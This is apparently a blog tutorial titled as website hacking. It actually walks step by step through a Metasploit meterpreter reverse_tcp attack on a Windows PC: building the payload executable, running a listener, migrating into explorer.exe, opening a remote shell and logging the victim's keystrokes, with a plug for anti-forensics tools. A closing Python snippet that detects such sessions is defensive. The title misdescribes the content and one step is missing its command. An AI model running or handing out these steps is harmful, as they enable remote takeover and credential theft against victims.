Hacking Website using METASPLOIT

How to hack a website using Metasploit?

METASPLOIT ANTI FORENSICS: Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.

Metasploit comes in the following versions:

1. CLI (Command Line Interface)

2. Web Interface

3. MSF Console

4. MSFwx

5. MSFAPI

I would recommend using the MSF Console because of its effectiveness and power from a pentester's POV. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.

I would recommend doing the following things in Metasploit on a Backtrack system or image, avoiding the Windows version of the tool. For those who don't know, Backtrack is a Linux distro made especially for security professionals, including all the tools required by a pentester. Download Backtrack from here. You can download the ISO or the VMware image, whichever you're comfortable with. If you have physical access to more than one system, go for the ISO image and install it on your hard disk.

Let the Hacking Begin: Open up Backtrack. You should have a screen similar to this.

The default login credentials are: Username: root, Password: toor.

Type in the following to start the wicd manager:

root@bt:~# /etc/init.d/wicd start

Finally, type "startx" to start the GUI mode:

root@bt:~# startx

First of all, know your local IP. Open up a konsole (on the bottom left of the taskbar) and type in:

root@bt:~# ifconfig

It would be something like 192.168.x.x or 10.x.x.x. Make a note of it.

Now, launch msfconsole by going to Applications >> Backtrack >> Metasploit Engineering Framework >> Framework Version 3 >> msfconsole. You should now have a shell similar to a command prompt in Windows:

msf>

Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window ("Session >> New Shell", or click on the small icon on the left of the shell tab in the bottom left corner of the window) and run:

root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST="your local ip" LPORT="any port you wish" x > /root/reverse_tcp.exe

Your local IP is the one you noted earlier, and for the port you could select 4444. (Everything has to be entered without quotes.) You should get something like this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#

Also, on your Backtrack desktop you would now see a reverse_tcp.exe file. Move it to your other computer on the same local network using a thumb drive or by uploading it online.

Now open the first shell window with msfconsole in it and type the following:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444

All the connections are done. You have already made an executable file which makes a reverse connection to you, and now you have set the meterpreter handler to listen on port 4444. The last step is to type in "exploit" and press enter:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...

Now the payload handler is listening for all incoming connections on port 4444. When the executable is run on the victim, you should see:

[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444->192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

You would see a meterpreter prompt like this:

meterpreter >

Type in ps to list the active processes:

meterpreter > ps

Search for explorer.exe and migrate to that process:

meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >

Type in the following:

meterpreter > use priv

Now, if you want to start the keylogger activity on the victim, just type keyscan_start.

Now, if you want to go to the victim's computer, just type shell:

meterpreter > shell
Process 5428 created.
Channel 1 created.

C:\Windows\system32>

You would now have a command prompt. Type in whoami to see the victim's computer name:

C:\Windows\system32> whoami
whoami
win7-pc\win 7

C:\Windows\system32>

Let's suppose you want to start a notepad on the victim's computer. Type in:

Let's say the victim has typed in anything on his computer. Just type exit to return to meterpreter. Now type in keyscan_dump to see all the typed keystrokes:

meterpreter > keyscan_dump
Dumping captured keystrokes...
GaM3 0V3R

P.S.
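From the defender's side, the session above leaves a distinctive trace on the victim: after the migrate step, explorer.exe holds an outbound TCP connection to the handler on port 4444. The following check is an added example, not code from the original post; the record format (proto, local, remote, state, pid, process) and both watch-lists are my assumptions, and the sample records are constructed to mirror the session on this page.

```python
"""Flag host connections consistent with a migrated reverse_tcp session:
an established outbound TCP connection to Metasploit's default handler
port, or from a process that normally never talks to the network."""
from dataclasses import dataclass

# Assumption: reviewer-chosen watch-lists, not anything shipped by Metasploit.
DEFAULT_HANDLER_PORTS = {4444}
NO_NETWORK_PROCESSES = {"explorer.exe", "notepad.exe"}


@dataclass(frozen=True)
class Conn:
    proto: str
    local: str
    remote: str
    state: str
    pid: int
    process: str


def parse_line(line):
    """Parse one constructed record: proto local remote state pid process."""
    proto, local, remote, state, pid, process = line.split()
    return Conn(proto, local, remote, state, int(pid), process.lower())


def remote_port(conn):
    """Port number of the remote endpoint ('host:port')."""
    return int(conn.remote.rsplit(":", 1)[1])


def suspicious(conn):
    """Return the reasons (possibly none) a connection looks like a reverse shell."""
    reasons = []
    if conn.proto != "TCP" or conn.state != "ESTABLISHED":
        return reasons
    if remote_port(conn) in DEFAULT_HANDLER_PORTS:
        reasons.append("remote port is a default Metasploit handler port")
    if conn.process in NO_NETWORK_PROCESSES:
        reasons.append(f"{conn.process} normally makes no outbound TCP connections")
    return reasons


def scan(lines):
    """Map pid -> reasons for every record that trips at least one check."""
    return {c.pid: r for c in map(parse_line, lines) if (r := suspicious(c))}


# Constructed sample: the victim-side view of the session on this page
SAMPLE = [
    "TCP 192.168.255.1:62853 192.168.255.130:4444 ESTABLISHED 5716 explorer.exe",
    "TCP 192.168.255.1:49700 203.0.113.10:443 ESTABLISHED 1204 chrome.exe",
    "TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 812 svchost.exe",
]

if __name__ == "__main__":
    for pid, reasons in scan(SAMPLE).items():
        print(pid, "; ".join(reasons))
```

On a live host the same records come from netstat -ano with the pid joined to tasklist output; the port check catches the default configuration shown here, while the process check still fires when the operator picks another port.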

The above information is for educational purposes only. You should test it only against a computer you own.

I am not responsible for any crime, do it at your own risk.....:)
